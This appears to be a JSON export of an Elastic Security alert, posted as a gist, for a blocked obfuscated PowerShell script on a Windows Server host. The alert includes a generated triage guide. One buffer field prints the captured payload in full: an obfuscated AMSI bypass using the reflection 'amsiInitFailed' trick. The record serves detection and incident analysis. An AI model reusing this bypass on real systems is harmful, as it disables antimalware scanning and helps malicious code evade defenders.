| "user.name": [ | |
| "Administrator" | |
| ], | |
| "Events.process.Ext.code_signature.subject_name": [ | |
| "Microsoft Windows" | |
| ], | |
| "kibana.alert.original_data_stream.dataset": [ | |
| "endpoint.alerts" | |
| ], | |
| "Endpoint.policy.applied.artifacts.global.version": [ | |
| "1.0.1638+2025-10-13-daily" | |
| ], | |
| "Events.host.os.Ext.variant": [ | |
| "Windows Server 2019 Standard" | |
| ], | |
| "signal.original_event.id": [ | |
| "OCsWZ8Jp4Gz3668A++++g348" | |
| ], | |
| "Endpoint.policy.applied.artifacts.global.snapshot": [ | |
| "latest" | |
| ], | |
| "Events.event.category": [ | |
| "api" | |
| ], | |
| "user.domain": [ | |
| "WIN-SVR-2019-ST" | |
| ], | |
| "process.Ext.token.integrity_level_name": [ | |
| "high" | |
| ], | |
| "signal.original_event.type": [ | |
| "info", | |
| "denied" | |
| ], | |
| "kibana.alert.rule.note": [ | |
| "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Endpoint Security (Elastic Defend)\n\nElastic Defend is a robust endpoint security solution that monitors and protects systems by analyzing events and generating alerts for suspicious activities. Adversaries may exploit endpoints by executing unauthorized code or manipulating system processes. The detection rule leverages event data to identify alerts from Elastic Defend, focusing on potential threats while excluding non-relevant modules, thus enabling timely investigation of endpoint anomalies.\n\n### Possible investigation steps\n\n- Review the alert details to understand the specific event.kind:alert and event.module: endpoint that triggered the alert, ensuring it is not related to the excluded endgame module.\n- Examine the timeline of events leading up to the alert to identify any unusual or unauthorized activities, such as unexpected process executions or system changes.\n- Correlate the alert with other security events or logs from the same endpoint to gather additional context and determine if there is a pattern of suspicious behavior.\n- Investigate the source and destination of any network connections associated with the alert to identify potential command and control activity or data exfiltration attempts.\n- Check for any recent changes or updates to the endpoint's software or configuration that could explain the alert, ensuring they are legitimate and authorized.\n- Assess the risk score and severity of the alert in conjunction with other alerts from the same endpoint to prioritize the investigation and response efforts.\n\n### False positive analysis\n\n- Alerts triggered by routine software updates can be false positives. Users can create exceptions for known update processes to prevent unnecessary alerts.\n- System maintenance activities, such as scheduled scans or backups, may generate alerts. Exclude these activities by identifying their specific event signatures and adding them to the exception list.\n- Legitimate administrative actions, like remote desktop sessions or script executions by IT staff, might be flagged. Define exceptions for these actions by correlating them with authorized user accounts or IP addresses.\n- Frequent alerts from non-malicious applications that interact with system processes can be excluded by whitelisting these applications based on their hash or path.\n- Network monitoring tools that simulate attack patterns for testing purposes may trigger alerts. Exclude these tools by specifying their known behaviors and IP ranges in the exception settings.\n\n### Response and remediation\n\n- Isolate the affected endpoint immediately to prevent further unauthorized access or lateral movement within the network.\n- Analyze the alert details to identify the specific unauthorized code or process manipulation involved, and terminate any malicious processes identified.\n- Remove any unauthorized code or files from the affected endpoint, ensuring that all traces of the threat are eradicated.\n- Conduct a thorough review of system logs and event data to identify any additional indicators of compromise or related suspicious activities.\n- Update endpoint security configurations and signatures to prevent similar threats from exploiting the same vulnerabilities in the future.\n- Restore the affected endpoint from a known good backup if necessary, ensuring that the system is free from any residual threats.\n- Escalate the incident to the security operations center (SOC) or relevant team for further analysis and to determine if additional systems may be affected." | |
| ], | |
| "kibana.alert.rule.max_signals": [ | |
| 1000 | |
| ], | |
| "signal.rule.author": [ | |
| "Elastic" | |
| ], | |
| "kibana.alert.rule.risk_score": [ | |
| 47 | |
| ], | |
| "process.code_signature.status": [ | |
| "trusted" | |
| ], | |
| "signal.original_event.dataset": [ | |
| "endpoint.alerts" | |
| ], | |
| "kibana.alert.rule.consumer": [ | |
| "siem" | |
| ], | |
| "kibana.alert.rule.category": [ | |
| "Custom Query Rule" | |
| ], | |
| "event.action": [ | |
| "rule_detection" | |
| ], | |
| "event.ingested": [ | |
| "2025-10-14T15:22:06.000Z" | |
| ], | |
| "@timestamp": [ | |
| "2025-10-14T15:22:17.361Z" | |
| ], | |
| "kibana.alert.original_event.action": [ | |
| "rule_detection" | |
| ], | |
| "kibana.alert.original_event.agent_id_status": [ | |
| "verified" | |
| ], | |
| "data_stream.dataset": [ | |
| "endpoint.alerts" | |
| ], | |
| "signal.rule.timestamp_override": [ | |
| "event.ingested" | |
| ], | |
| "kibana.alert.rule.execution.uuid": [ | |
| "f57614b2-41d6-4d61-bba2-ed5d8a040f12" | |
| ], | |
| "kibana.alert.uuid": [ | |
| "f5416543d2a90170e669a1304a4a3afd73311220b52072064b09c619f5e31659" | |
| ], | |
| "signal.rule.note": [ | |
| "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Endpoint Security (Elastic Defend)\n\nElastic Defend is a robust endpoint security solution that monitors and protects systems by analyzing events and generating alerts for suspicious activities. Adversaries may exploit endpoints by executing unauthorized code or manipulating system processes. The detection rule leverages event data to identify alerts from Elastic Defend, focusing on potential threats while excluding non-relevant modules, thus enabling timely investigation of endpoint anomalies.\n\n### Possible investigation steps\n\n- Review the alert details to understand the specific event.kind:alert and event.module: endpoint that triggered the alert, ensuring it is not related to the excluded endgame module.\n- Examine the timeline of events leading up to the alert to identify any unusual or unauthorized activities, such as unexpected process executions or system changes.\n- Correlate the alert with other security events or logs from the same endpoint to gather additional context and determine if there is a pattern of suspicious behavior.\n- Investigate the source and destination of any network connections associated with the alert to identify potential command and control activity or data exfiltration attempts.\n- Check for any recent changes or updates to the endpoint's software or configuration that could explain the alert, ensuring they are legitimate and authorized.\n- Assess the risk score and severity of the alert in conjunction with other alerts from the same endpoint to prioritize the investigation and response efforts.\n\n### False positive analysis\n\n- Alerts triggered by routine software updates can be false positives. Users can create exceptions for known update processes to prevent unnecessary alerts.\n- System maintenance activities, such as scheduled scans or backups, may generate alerts. Exclude these activities by identifying their specific event signatures and adding them to the exception list.\n- Legitimate administrative actions, like remote desktop sessions or script executions by IT staff, might be flagged. Define exceptions for these actions by correlating them with authorized user accounts or IP addresses.\n- Frequent alerts from non-malicious applications that interact with system processes can be excluded by whitelisting these applications based on their hash or path.\n- Network monitoring tools that simulate attack patterns for testing purposes may trigger alerts. Exclude these tools by specifying their known behaviors and IP ranges in the exception settings.\n\n### Response and remediation\n\n- Isolate the affected endpoint immediately to prevent further unauthorized access or lateral movement within the network.\n- Analyze the alert details to identify the specific unauthorized code or process manipulation involved, and terminate any malicious processes identified.\n- Remove any unauthorized code or files from the affected endpoint, ensuring that all traces of the threat are eradicated.\n- Conduct a thorough review of system logs and event data to identify any additional indicators of compromise or related suspicious activities.\n- Update endpoint security configurations and signatures to prevent similar threats from exploiting the same vulnerabilities in the future.\n- Restore the affected endpoint from a known good backup if necessary, ensuring that the system is free from any residual threats.\n- Escalate the incident to the security operations center (SOC) or relevant team for further analysis and to determine if additional systems may be affected." | |
| ], | |
| "Endpoint.policy.applied.artifacts.user.identifiers.name": [ | |
| "endpoint-blocklist-windows-v1", | |
| "endpoint-eventfilterlist-windows-v1", | |
| "endpoint-exceptionlist-windows-v1", | |
| "endpoint-hostisolationexceptionlist-windows-v1", | |
| "endpoint-trustlist-windows-v1" | |
| ], | |
| "signal.rule.license": [ | |
| "Elastic License v2" | |
| ], | |
| "kibana.alert.rule.rule_id": [ | |
| "9a1a2dae-0b5f-4c3d-8305-a268d404c306" | |
| ], | |
| "signal.rule.type": [ | |
| "query" | |
| ], | |
| "Endpoint.policy.applied.version": [ | |
| "12" | |
| ], | |
| "Events.process.Ext.api.parameters.size": [ | |
| 3822 | |
| ], | |
| "signal.rule.rule_name_override": [ | |
| "message" | |
| ], | |
| "Events.process.Ext.code_signature.exists": [ | |
| true | |
| ], | |
| "kibana.alert.url": [ | |
| "https://samir.kb.us-central1.gcp.cloud.es.io/app/security/alerts/redirect/f5416543d2a90170e669a1304a4a3afd73311220b52072064b09c619f5e31659?index=.alerts-security.alerts-default×tamp=2025-10-14T15:22:17.361Z" | |
| ], | |
| "kibana.alert.rule.risk_score_mapping.field": [ | |
| "event.risk_score" | |
| ], | |
| "Events._label": [ | |
| "amsi_powershell_obfuscation_pattern" | |
| ], | |
| "process.pid": [ | |
| 1968 | |
| ], | |
| "signal.rule.created_by": [ | |
| "586246785" | |
| ], | |
| "signal.rule.interval": [ | |
| "1m" | |
| ], | |
| "kibana.alert.rule.created_by": [ | |
| "586246785" | |
| ], | |
| "kibana.alert.rule.timestamp_override": [ | |
| "event.ingested" | |
| ], | |
| "Events.process.entity_id": [ | |
| "Fr+lArd4jbWUm9nDJqjXuw" | |
| ], | |
| "process.code_signature.subject_name": [ | |
| "Microsoft Windows" | |
| ], | |
| "kibana.alert.rule.name": [ | |
| "Malicious Behavior Prevention Alert: Potential Obfuscated PowerShell Script" | |
| ], | |
| "host.name": [ | |
| "win-svr-2019-st" | |
| ], | |
| "event.kind": [ | |
| "signal" | |
| ], | |
| "process.code_signature.trusted": [ | |
| true | |
| ], | |
| "Events.process.Ext.api.parameters.buffer": [ | |
| "$MV3l1C=$null;$rWS16tHn4=\"System.$(('Mánäg'+'èmênt').NoRmAliZE([Char](70)+[cHAR](111)+[ChaR](114+75-75)+[cHAR](65+44)+[chAr]([ByTe]0x44)) -replace [cHar](92*70/70)+[Char]([bytE]0x70)+[ChaR]([ByTE]0x7b)+[Char](77)+[chaR](108+2)+[chAR]([byTE]0x7d)).$(('Äú'+'tô'+'mä'+'tì'+'õn').NOrmaliZe([chAr](70*53/53)+[CHaR]([bytE]0x6f)+[cHaR]([BYTE]0x72)+[chAr](109)+[cHAr](10+58)) -replace [chAr](92+90-90)+[chAr]([bYTE]0x70)+[chAR](123+7-7)+[cHaR]([bYte]0x4d)+[cHAr]([bytE]0x6e)+[ChAR]([bYTe]0x7d)).$(('Á'+'m'+'s'+'î'+'Ù'+'t'+'í'+'l'+'s').nORMalIze([CHAR](14+56)+[chAR]([bYtE]0x6f)+[chAr]([bYte]0x72)+[CHaR](109*15/15)+[char]([bYtE]0x44)) -replace [CHAR](92+51-51)+[ChaR]([BYte]0x70)+[chaR]([Byte]0x7b)+[chAR]([BytE]0x4d)+[ChAR]([bytE]0x6e)+[ChaR](125))\";$igaqlsqbbrpoqjdswzgcmyrdbwdoj=\"+[chaR](99*97/97)+[CHAr]([BYTE]0x72)+[cHar]([byte]0x71)+[CHar](100+3-3)+[CHAR]([ByTE]0x65)+[Char](103*40/40)+[chAR](117*11/11)+[ChAr](115+45-45)+[cHAR](120)+[cHaR](113)+[cHAr]([BYTE]0x78)+[CHar]([bYtE]0x6b)+[Char](64+40)+[cHAR]([BYtE]0x62)+[CHAr]([BYte]0x7a)+[char](71+38)+[CHar]([byTE]0x6f)+[chAr](105*92/92)+[CHAR]([byte]0x66)+[Char](111+37-37)+[Char]([BYte]0x64)+[cHAr]([byTe]0x6a)\";[Threading.Thread]::Sleep(1873);[Ref].Assembly.GetType($rWS16tHn4).GetField($(('àmsì'+'Înít'+'Fâíl'+'êd').NOrMaLIze([CHAR](30+40)+[chAR]([BYTe]0x6f)+[char](114)+[cHar]([BYte]0x6d)+[chAr](1+67)) -replace [CHAr](44+48)+[chAR](112+105-105)+[chaR](123+92-92)+[chAr](77)+[CHAR]([Byte]0x6e)+[CHaR]([byte]0x7d)),\"NonPublic,Static\").SetValue($MV3l1C,$true);$qrxwkay=\"+[ChAr]([Byte]0x69)+[chAR]([byte]0x6e)+[ChaR]([byte]0x7a)+[cHAr]([BYTE]0x72)+[chAR](97+56-56)+[CHar]([bYtE]0x64)+[CHar](115)+[char]([bytE]0x61)+[cHAR](121)+[cHar]([BYtE]0x6e)+[chAR]([bytE]0x67)+[ChaR](98+77-77)+[CHaR](54+46)+[chAR]([bYTe]0x79)+[ChaR](61+46)+[ChAR](116)+[CHar](97*85/85)+[cHaR]([byTe]0x62)+[ChAR]([ByTE]0x6b)\";[Threading.Thread]::Sleep(1232)\n#Matt Graebers Reflection method " | |
| ], | |
| "signal.rule.created_at": [ | |
| "2025-08-25T09:37:22.832Z" | |
| ], | |
| "kibana.alert.workflow_status": [ | |
| "open" | |
| ], | |
| "Events.host.name": [ | |
| "win-svr-2019-st" | |
| ], | |
| "kibana.alert.original_event.created": [ | |
| "2025-10-14T15:21:30.576Z" | |
| ], | |
| "threat.tactic.id": [ | |
| "TA0002" | |
| ], | |
| "Events.host.os.platform": [ | |
| "windows" | |
| ], | |
| "Events.host.architecture": [ | |
| "x86_64" | |
| ], | |
| "Events.host.os.kernel": [ | |
| "1809 (10.0.17763.2061)" | |
| ], | |
| "threat.tactic.name": [ | |
| "Execution" | |
| ], | |
| "threat.technique.subtechnique.name.text": [ | |
| "PowerShell" | |
| ], | |
| "kibana.alert.reason": [ | |
| "malware, intrusion_detection event with process powershell.exe, by Administrator on win-svr-2019-st created high alert Malicious Behavior Prevention Alert: Potential Obfuscated PowerShell Script." | |
| ], | |
| "data_stream.type": [ | |
| "logs" | |
| ], | |
| "signal.ancestors.id": [ | |
| "AZnjUAfs4fyCfCR7INh3" | |
| ], | |
| "signal.original_time": [ | |
| "2025-10-14T15:21:30.576Z" | |
| ], | |
| "Responses.process.pid": [ | |
| 1968 | |
| ], | |
| "ecs.version": [ | |
| "8.10.0" | |
| ], | |
| "signal.rule.severity": [ | |
| "high" | |
| ], | |
| "event.created": [ | |
| "2025-10-14T15:21:30.576Z" | |
| ], | |
| "Responses.action.state": [ | |
| 0 | |
| ], | |
| "kibana.alert.depth": [ | |
| 1 | |
| ], | |
| "kibana.alert.rule.revision": [ | |
| 0 | |
| ], | |
| "Events.message": [ | |
| "Endpoint API event - AmsiScanBuffer" | |
| ], | |
| "signal.rule.version": [ | |
| "108" | |
| ], | |
| "kibana.alert.status": [ | |
| "active" | |
| ], | |
| "kibana.alert.last_detected": [ | |
| "2025-10-14T15:22:17.403Z" | |
| ], | |
| "Events.host.os.family": [ | |
| "windows" | |
| ], | |
| "threat.tactic.reference": [ | |
| "https://attack.mitre.org/tactics/TA0002/" | |
| ], | |
| "Events.user.domain": [ | |
| "WIN-SVR-2019-ST" | |
| ], | |
| "kibana.alert.rule.severity_mapping.field": [ | |
| "event.severity", | |
| "event.severity", | |
| "event.severity", | |
| "event.severity" | |
| ], | |
| "kibana.alert.original_event.dataset": [ | |
| "endpoint.alerts" | |
| ], | |
| "Events._state": [ | |
| 0 | |
| ], | |
| "kibana.alert.rule.rule_type_id": [ | |
| "siem.queryRule" | |
| ], | |
| "signal.rule.rule_id": [ | |
| "9a1a2dae-0b5f-4c3d-8305-a268d404c306" | |
| ], | |
| "process.executable": [ | |
| "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" | |
| ], | |
| "kibana.alert.original_event.severity": [ | |
| 73 | |
| ], | |
| "process.parent.executable": [ | |
| "C:\\Windows\\System32\\cmd.exe" | |
| ], | |
| "Events.host.os.version": [ | |
| "1809 (10.0.17763.2061)" | |
| ], | |
| "process.args_count": [ | |
| 1 | |
| ], | |
| "kibana.alert.rule.updated_at": [ | |
| "2025-08-25T09:37:22.832Z" | |
| ], | |
| "Events.event.id": [ | |
| "OCsWZ8Jp4Gz3668A++++g337" | |
| ], | |
| "data_stream.namespace": [ | |
| "default" | |
| ], | |
| "kibana.alert.rule.author": [ | |
| "Elastic" | |
| ], | |
| "process.Ext.code_signature.exists": [ | |
| true | |
| ], | |
| "Endpoint.policy.applied.endpoint_policy_version": [ | |
| "11" | |
| ], | |
| "Events.process.pid": [ | |
| 1968 | |
| ], | |
| "signal.original_event.action": [ | |
| "rule_detection" | |
| ], | |
| "kibana.alert.rule.created_at": [ | |
| "2025-08-25T09:37:22.832Z" | |
| ], | |
| "process.pe.imphash": [ | |
| "741776aaccfc5b71ff59832dcdcace0f" | |
| ], | |
| "signal.rule.to": [ | |
| "now" | |
| ], | |
| "event.type": [ | |
| "info", | |
| "denied" | |
| ], | |
| "process.command_line": [ | |
| "powershell" | |
| ], | |
| "kibana.alert.rule.execution.type": [ | |
| "scheduled" | |
| ], | |
| "Events.process.code_signature.exists": [ | |
| true | |
| ], | |
| "kibana.alert.rule.exceptions_list.id": [ | |
| "endpoint_list" | |
| ], | |
| "event.dataset": [ | |
| "endpoint.alerts" | |
| ], | |
| "kibana.alert.original_time": [ | |
| "2025-10-14T15:21:30.576Z" | |
| ] | |
| } | |
| } | 
  
    Sign up for free
    to join this conversation on GitHub.
    Already have an account?
    Sign in to comment